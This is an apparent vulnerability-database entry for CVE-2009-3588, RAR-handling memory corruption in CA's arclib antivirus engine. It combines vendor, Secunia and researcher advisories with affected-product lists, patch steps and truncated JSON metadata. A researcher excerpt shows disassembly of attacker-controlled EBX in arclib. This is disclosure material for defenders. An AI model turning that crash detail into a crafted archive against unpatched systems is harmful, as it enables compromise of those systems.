Find a vulnerability
Search criteria
ⓘ
Use this form to refine search results.
Full-text search supports keyword queries with ranking and filtering.
You can combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by date instead of relevance.
305 vulnerabilities by ca
VAR-200910-0097
Vulnerability from variot - Updated: 2024-05-18 22:56Unspecified vulnerability in the arclib component in the Anti-Virus engine in CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 through r8.1; Anti-Virus 2007 (v8) through 2009; eTrust EZ Antivirus r7.1; Internet Security Suite 2007 (v3) through Plus 2009; and other CA products allows remote attackers to cause a denial of service via a crafted RAR archive file that triggers stack corruption, a different vulnerability than CVE-2009-3587. This vulnerability CVE-2009-3587 Is a different vulnerability.Skillfully crafted by a third party RAR Service disruption via archive files (DoS) There is a possibility of being put into a state. Multiple Computer Associates products are prone to memory-corruption vulnerabilities that affect the Anti-Virus engine. An attacker can exploit these issues to execute arbitrary code in the context of the affected applications or cause denial-of-service conditions. The issues affect the Anti-Virus engine with versions prior to 'arclib' 8.1.4.0. Computer Associates is the world's leading security vendor, products include a variety of anti-virus software and backup recovery systems. CA20091008-01: Security Notice for CA Anti-Virus Engine
Issued: October 8, 2009
CA's support is alerting customers to multiple security risks associated with CA Anti-Virus Engine. Vulnerabilities exist in the arclib component that can allow a remote attacker to cause a denial of service, or to cause heap corruption and potentially further compromise a system. CA has issued fixes to address the vulnerabilities. An attacker can create a malformed RAR archive file that results in heap corruption and allows the attacker to cause a denial of service or possibly further compromise the system. An attacker can create a malformed RAR archive file that results in stack corruption and allows the attacker to cause a denial of service.
Risk Rating
Medium
Platform
Windows UNIX Linux Solaris Mac OS X Netware
Affected Products
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8 CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8.1 CA Anti-Virus 2007 (v8) CA Anti-Virus 2008 CA Anti-Virus 2009 CA Anti-Virus Plus 2009 eTrust EZ Antivirus r7.1 CA Internet Security Suite 2007 (v3) CA Internet Security Suite 2008 CA Internet Security Suite Plus 2008 CA Internet Security Suite Plus 2009 CA Threat Manager for the Enterprise (formerly eTrust Integrated Threat Management) r8 CA Threat Manager for the Enterprise (formerly eTrust Integrated Threat Management) 8.1 CA Threat Manager Total Defense CA Gateway Security r8.1 CA Protection Suites r2 CA Protection Suites r3 CA Protection Suites r3.1 CA Secure Content Manager (formerly eTrust Secure Content Manager) 1.1 CA Secure Content Manager (formerly eTrust Secure Content Manager) 8.0 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.0 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.1 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r11 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r11.1 CA ARCserve Backup r11.5 on Windows CA ARCserve Backup r12 on Windows CA ARCserve Backup r12.0 SP1 on Windows CA ARCserve Backup r12.0 SP 2 on Windows CA ARCserve Backup r12.5 on Windows CA ARCserve Backup r11.1 Linux CA ARCserve Backup r11.5 Linux CA ARCserve for Windows Client Agent CA ARCserve for Windows Server component CA eTrust Intrusion Detection 2.0 SP1 CA eTrust Intrusion Detection 3.0 CA eTrust Intrusion Detection 3.0 SP1 CA Common Services (CCS) r3.1 CA Common Services (CCS) r11 CA Common Services (CCS) r11.1 CA Anti-Virus SDK (formerly eTrust Anti-Virus SDK) CA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1
Non-Affected Products
CA Anti-Virus engine with arclib version 8.1.4.0 or later installed
How to determine if the installation is affected
For products on Windows:
- Using Windows Explorer, locate the file "arclib.dll". By default, the file is located in the "C:\Program Files\CA\SharedComponents\ScanEngine" directory (*).
- Right click on the file and select Properties.
- Select the Version tab.
-
If the file version is earlier than indicated below, the installation is vulnerable.
File Name File Version arclib.dll 8.1.4.0
*For eTrust Intrusion Detection 2.0, the file is located in "Program Files\eTrust\Intrusion Detection\Common", and for eTrust Intrusion Detection 3.0 and 3.0 sp1, the file is located in "Program Files\CA\Intrusion Detection\Common".
For CA Anti-Virus r8.1 on non-Windows platforms:
Use the compver utility provided on the CD to determine the version of Arclib. If the version is less than 8.1.4.0, the installation is vulnerable.
Example compver utility output:
------------------------------------------------
COMPONENT NAME VERSION
------------------------------------------------
eTrust Antivirus Arclib Archive Library 8.1.4.0
... (followed by other components)
For reference, the following are file names for arclib on non-Windows operating systems:
Operating System File name
Solaris libarclib.so
Linux libarclib.so
Mac OS X arclib.bundle
Solution
CA released arclib 8.1.4.0 on August 12 2009. If your product is configured for automatic updates, you should already be protected, and you need to take no action. If your product is not configured for automatic updates, then you simply need to run the update utility included with your product.
CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.0: apply fix # RO11964.
CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.1: apply fix # RO11964.
CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r11: apply fix # RO11964.
CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r11.1: apply fix # RO11964.
CA Common Services (CCS) r3.1: apply fix # RO11954.
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 32bit: apply fix # RO10663.
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 IA64: apply fix # RO10664.
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 AMD64: apply fix # RO10665.
CA Secure Content Manager (formerly eTrust Secure Content Manager) r1.1: apply fix # RO10999.
CA Secure Content Manager (formerly eTrust Secure Content Manager) r8.0: apply fix # RO10999.
CA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1: apply fix # RO11000.
CA Gateway Security r8.1: RO10999.
CA ARCserve for Windows Server component installed on a 64 bit machine: apply fixes # RO10663 and RO10664 (IA64) or RO10665 (AMD64).
CA ARCserve for Windows Server component installed on a 32 bit machine: apply fix # RO10663.
CA ARCserve for Windows Client Agent installed on a 64 bit machine: apply fix # RO10664 (IA64) or RO10665 (AMD64).
CA ARCserve for Windows Client Agent installed on a 32 bit machine: apply fix # RO10663.
CA ARCserve for Linux Server r11.5: apply fix # RO10729.
CA ARCserve for Linux:
-
Download RO10729.tar.Z from RO10729 into a temporary location /tmp/RO10729
-
Uncompress and untar RO10729.tar.Z as follows: uncompress RO10729.tar.Z tar -xvf RO10729.tar The new "libarclib.so" will be extracted to /tmp/RO10729
-
Change the directory to $CAIGLBL0000/ino/config as follows: cd $CAIGLBL0000/ino/config
-
Rename "libarclib.so" to "libarclib.so.RO10729" as follows: mv libarclib.so libarclib.so.RO10729
-
Copy the new libarclib.so as follows: cp /tmp/RO10729/libarclib.so $CAIGLBL0000/ino/config/
-
chmod +x $CAIGLBL0000/ino/config/libarclib.so
-
Stop the common agent (caagent stop)
-
Change the directory to ARCserve common agent directory (typically /opt/CA/BABcmagt) cd /opt/CA/BABcmagt Note: To find out the agent home directory run the following command: dirname 'ls -l /usr/bin/caagent |cut -f2 -d">"'
-
Save a copy of libarclib.so cp -p libarclib.so libarclib.so.RO10729
-
Copy over the new libarclib.so as follows: cp $/tmp/RO10729/libarclib.so.
-
Start the common agent (caagent start)
-
Repeat steps (7-11) on all remote Linux client agents' installations.
-
rm -rf /tmp/RO10729
Workaround
Do not open email attachments or download files from untrusted sources.
If additional information is required, please contact CA Support at http://support.ca.com/.
If you discover a vulnerability in CA products, please report your findings to the CA Product Vulnerability Response Team. support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782
Regards, Ken Williams, Director ; 0xE2941985 CA Product Vulnerability Response Team
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2009 CA. All rights reserved. ----------------------------------------------------------------------
Do you have VARM strategy implemented?
(Vulnerability Assessment Remediation Management)
If not, then implement it through the most reliable vulnerability intelligence source on the market.
Implement it through Secunia.
For more information visit: http://secunia.com/advisories/business_solutions/
Alternatively request a call from a Secunia representative today to discuss how we can help you with our capabilities contact us at: sales@secunia.com
TITLE: CA Anti-Virus Engine RAR Processing Two Vulnerabilities
SECUNIA ADVISORY ID: SA36976
VERIFY ADVISORY: http://secunia.com/advisories/36976/
DESCRIPTION: Two vulnerabilities have been reported in multiple CA products, which can be exploited by malicious people to cause a DoS (Denial of Service) or to potentially compromise a vulnerable system.
Successful exploitation may allow execution of arbitrary code.
Please see the vendor's advisory for detailed instructions on applying patches.
PROVIDED AND/OR DISCOVERED BY: The vendor credits Thierry Zoller.
ORIGINAL ADVISORY: CA20091008-01: https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. Background ~~~~~~~~~~~~~ Quote: "CA is one of the world's largest IT management software providers. We serve more than 99% of Fortune 1000 companies, as well as government entities, educational institutions and thousands of other companies in diverse industries worldwide"
"CA Anti-Virus for the Enterprise is the next generation in comprehensive anti-virus security for business PCs, servers and PDAs. It combines proactive protection against malware with new, powerful management features that stop and remove malicious code before it enters your network, reducing system downtime"
II.
Attacker has control over EBX :
Basic Block: 6e4305b0 mov cl,byte ptr [ebx] Tainted Input Operands: ebx 6e4305b2 add edi,28h 6e4305b5 push edi 6e4305b6 lea edx,[esp+14h] 6e4305ba mov byte ptr [esp+14h],cl Tainted Input Operands: cl 6e4305be inc ebx Tainted Input Operands: ebx 6e4305bf push edx 6e4305c0 mov ecx,esi 6e4305c2 mov dword ptr [esp+1ch],ebx Tainted Input Operands: ebx 6e4305c6 call arclib!arctkopenarchive+0x283a0 (6e42f9f0)
III. Due to the nature of Anti-virus products, the attack vectors can be near endless. An attack could be done over the way of an E-mail message carrying an RAR attachment (of a file recognised as being RAR), USB, CD, Network data etc.
Please note that this is a general problem and not exclusive to Computer Associates.
IV. Disclosure timeline ~~~~~~~~~~~~~~~~~~~~~~~~~ DD.MM.YYYY 11.05.2009 - Reported CVE-2009-3587 03.06.2009 - Reported CVE-2009-3588 09.10.2009 - CA releases advisory https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878 13.10.2009 - G-SEC releases advisory
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200910-0097",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "anti-virus plus",
"scope": "eq",
"trust": 1.8,
"vendor": "ca",
"version": "2009"
},
{
"model": "arcserve backup",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r11.1"
},
{
"model": "arcserve backup",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r11.5"
},
{
"model": "etrust anti-virus gateway",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "7.1"
},
{
"model": "etrust anti-virus sdk",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r3.0"
},
{
"model": "threat manager total defense",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"model": "anti-virus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "7.1"
},
{
"model": "etrust integrated threat management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2008"
},
{
"model": "internet security suite 2008",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "arcserve for windows client agent",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "internet security suite plus 2008",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "gateway security",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r8.1"
},
{
"model": "secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2009"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.0"
},
{
"model": "threat manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r8"
},
{
"model": "secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r7.1"
},
{
"model": "protection suites",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r2"
},
{
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r11.1"
},
{
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r11"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "8.0"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r8"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "internet security suite plus 2009",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r8.1"
},
{
"model": "anti-virus sdk",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8"
},
{
"model": "threat manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "8.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2007"
},
{
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r3.1"
},
{
"model": "arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r12.0"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "3.1"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "3.0"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "arcserve for windows server component",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "protection suites",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r3.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "protection suites",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r3"
},
{
"model": "anti-virus",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-virus for the enterprise",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-virus gateway",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-virus sdk",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "arcserve backup",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "arcserve for windows client agent",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "arcserve for windows server component",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "common services",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "etrust intrusion detection",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "gateway security",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "internet security suite",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "internet security suite plus 2008",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "internet security suite plus 2009",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "network and systems management",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "protection suites",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "secure content manager",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "threat manager for the enterprise",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "threat manager total defense",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "etrust ez antivirus",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "arcserve backup",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "r12.0"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "7.1"
},
{
"model": "arcserve backup",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "r12.5"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "7.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates threat manager total defense",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates threat manager for the enterprise r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates threat manager for the enterprise r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates protection suites r2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates protection suites r3",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates protection suites",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates internet security suite plus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20090"
},
{
"model": "associates internet security suite plus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20080"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20080"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20073.0"
},
{
"model": "associates gateway security",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates etrust intrusion detection sp",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.01"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates etrust intrusion detection sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0.0"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates common services r11.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates common services r11",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates common services",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "12.5"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "12.0"
},
{
"model": "associates brightstor arcserve backup r12.0 windows sp1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates arcserve backup for linux sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux ga",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux ga",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates anti-virus sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates anti-virus gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates anti-virus for the enterprise r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates anti-virus for the enterprise r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates anti-virus for the enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates anti-virus plus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20090"
},
{
"model": "associates anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20090"
},
{
"model": "associates anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20078"
},
{
"model": "associates anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2008"
}
],
"sources": [
{
"db": "BID",
"id": "36653"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002629"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-200"
},
{
"db": "NVD",
"id": "CVE-2009-3588"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:ca:internet_security_suite_plus_2009:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:gateway_security:r8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:common_services:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_secure_content_manager:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_anti-virus_sdk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:anti-virus_for_the_enterprise:r8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:arcserve_for_windows_server_component:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_intrusion_detection:2.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:threat_manager:8.1:*:enterprise:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:protection_suites:r3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_ez_antivirus:r7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:internet_security_suite_2008:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:anti-virus:2009:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_intrusion_detection:3.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:anti-virus_plus:2009:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:protection_suites:r3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:anti-virus_gateway:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:threat_manager:r8:*:enterprise:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_anti-virus_gateway:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:arcserve_for_windows_client_agent:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:threat_manager_total_defense:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:internet_security_suite_plus_2008:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:protection_suites:r2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus:2008:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
